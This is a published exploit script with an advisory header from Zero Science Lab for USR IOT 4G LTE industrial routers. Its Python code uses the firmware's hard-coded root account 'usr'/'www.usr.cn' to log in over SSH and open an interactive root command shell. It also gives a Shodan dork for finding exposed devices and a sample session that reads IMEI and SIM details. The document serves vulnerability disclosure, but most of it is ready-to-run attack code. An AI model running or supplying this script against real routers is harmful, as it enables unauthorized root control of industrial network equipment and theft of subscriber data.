
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
|
|
# Exploit Author: LiquidWorm
|
|
|
|
#!/usr/bin/env python3
|
|
#
|
|
#
|
|
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
|
|
#
|
|
#
|
|
# Vendor: Jinan USR IOT Technology Limited
|
|
# Product web page: https://www.pusr.com | https://www.usriot.com
|
|
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
|
|
# 1.2.7 (USR-LG220-L)
|
|
#
|
|
# Summary: USR-G806 is an industrial 4G wireless LTE router which provides
|
|
# a solution for users to connect own device to 4G network via WiFi interface
|
|
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
|
|
# can support 580MHz working frequency and can be widely used in Smart Grid,
|
|
# Smart Home, public bus and Vending machine for data transmission at high
|
|
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
|
|
# flow control and has many advantages including high reliability, simple
|
|
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
|
|
# WLAN interface, 4G interface. USR-G806 provides various networking mode
|
|
# to help user establish own network.
|
|
#
|
|
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
|
|
# within its Linux distribution image. These sets of credentials are never
|
|
# exposed to the end-user and cannot be changed through any normal operation
|
|
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
|
|
# privileges on the device. The password is also the default WLAN password.
|
|
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
|
|
#
|
|
# -------------------------------------------------------------------------
|
|
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
|
|
#
|
|
# --Got rewt!
|
|
# # id;id root;pwd
|
|
# uid=0(usr) gid=0(usr)
|
|
# uid=2(root) gid=2(root) groups=2(root)
|
|
# /root
|
|
# # crontab -l
|
|
# */2 * * * * /etc/ltedial
|
|
# */20 * * * * /etc/init.d/Net_4G_Check.sh
|
|
# */15 * * * * /etc/test_log.sh
|
|
# */120 * * * * /etc/pddns/pddns_start.sh start &
|
|
# 44 4 * * * /etc/init.d/sysreboot.sh &
|
|
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
|
|
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
|
|
# cat /tmp/usrlte_info
|
|
# Local time is Fri Apr 15 05:38:56 2022
|
|
# (loop)
|
|
# IMEI Number:8*************1
|
|
# Operator information:********Telecom
|
|
# signal intensity:normal(20)
|
|
#
|
|
# Software version number:E*****************G
|
|
# SIM Card CIMI number:4*************7
|
|
# SIM Card number:8******************6
|
|
# Short message service center number:"+8**********1"
|
|
# system information:4G Mode
|
|
# PDP protocol:"IPV4V6"
|
|
# CREG:register
|
|
# Check ME password:READY
|
|
# base station information:"4**D","7*****B"
|
|
# cat /tmp/usrlte_info_imsi
|
|
# 4*************7
|
|
# # exit
|
|
#
|
|
# lqwrm@metalgear:~$
|
|
# -------------------------------------------------------------------------
|
|
#
|
|
# Tested on: GNU/Linux 3.10.14 (mips)
|
|
# OpenWrt/Linaro GCC 4.8-2014.04
|
|
# Ralink SoC MT7628 PCIe RC mode
|
|
# BusyBox v1.22.1
|
|
# uhttpd
|
|
# Lua
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2022-5705
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
|
|
#
|
|
#
|
|
# 10.04.2022
|
|
#
|
|
|
|
|
|
import paramiko as bah
|
|
import sys as baaaaaah
|
|
|
|
# Start-up banner; the box-drawing glyphs assume a UTF-8 capable terminal.
bnr='''
▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄
█▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
█▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪
▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀
▀▄ █·▪ ▪ •██
▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪
▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
'''
print(bnr)

# Usage: <script> <host> (see the transcript in the header). Only the host is
# taken from the command line; port and credentials are fixed below.
# NOTE: a missing argument exits with status 0, so a wrapper cannot tell
# "no target given" apart from a normal run by exit code alone.
if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
# The hard-coded firmware account described in the header ("Desc"); the
# password is also the device's default WLAN password. These values are the
# finding itself - they are not user-configurable on the affected firmware.
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
# AutoAddPolicy accepts any unknown host key without verification, so this
# session has no protection against an interposed SSH endpoint. Fine for a
# one-off check against a lab device; not suitable for anything else.
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    # Port 2222 is used here; the original trailing comment ("#22 Ook.")
    # suggests port 22 was also seen - TODO confirm against the device.
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    # Bare except: catches everything (timeouts, DNS failures, auth failures,
    # even KeyboardInterrupt) and reports all of them as "backdoor removed".
    # A device that is merely unreachable is therefore indistinguishable from
    # a remediated one - treat this message as "could not authenticate", not
    # as proof the account is gone. Exit status -1 is reported as 255 by the
    # shell.
    print('--Backdoor removed.')
    exit(-1)

# Minimal interactive loop: every line entered is sent as a separate
# exec_command call, i.e. a new channel per command with no persistent shell
# state (cwd/env changes do not carry over to the next command). stderr is
# never read, and stdout is decoded with the default UTF-8 codec, which would
# raise on non-UTF-8 output. 'exit' is sent to the remote side as a courtesy
# before the loop ends; its channel output is never read.
while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

# Closes the transport; not reached if the loop is interrupted, in which
# case the connection is torn down on interpreter exit instead.
rsh.close()